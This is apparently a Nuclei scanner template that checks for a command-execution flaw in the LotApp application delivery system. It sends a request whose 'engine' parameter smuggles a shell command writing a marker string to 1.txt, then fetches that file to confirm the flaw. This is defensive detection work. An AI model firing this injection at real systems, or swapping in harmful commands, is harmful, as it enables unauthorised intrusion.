id: lotapp-rce

info:
  name: LotApp应用交付系统命令执行漏洞
  author: Str1am
  severity: high
  tags: lotapp,rce

requests:
  - method: GET
    path:
      - "{{BaseURL}}/acc/debug/bytecache_run_action.php?action=1&engine=test%27|echo%2054dhnbd545845fvbgdtgfn>1.txt||%27a"
      - "{{BaseURL}}/acc/debug/1.txt"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "54dhnbd545845fvbgdtgfn"
        part: body
        condition: and
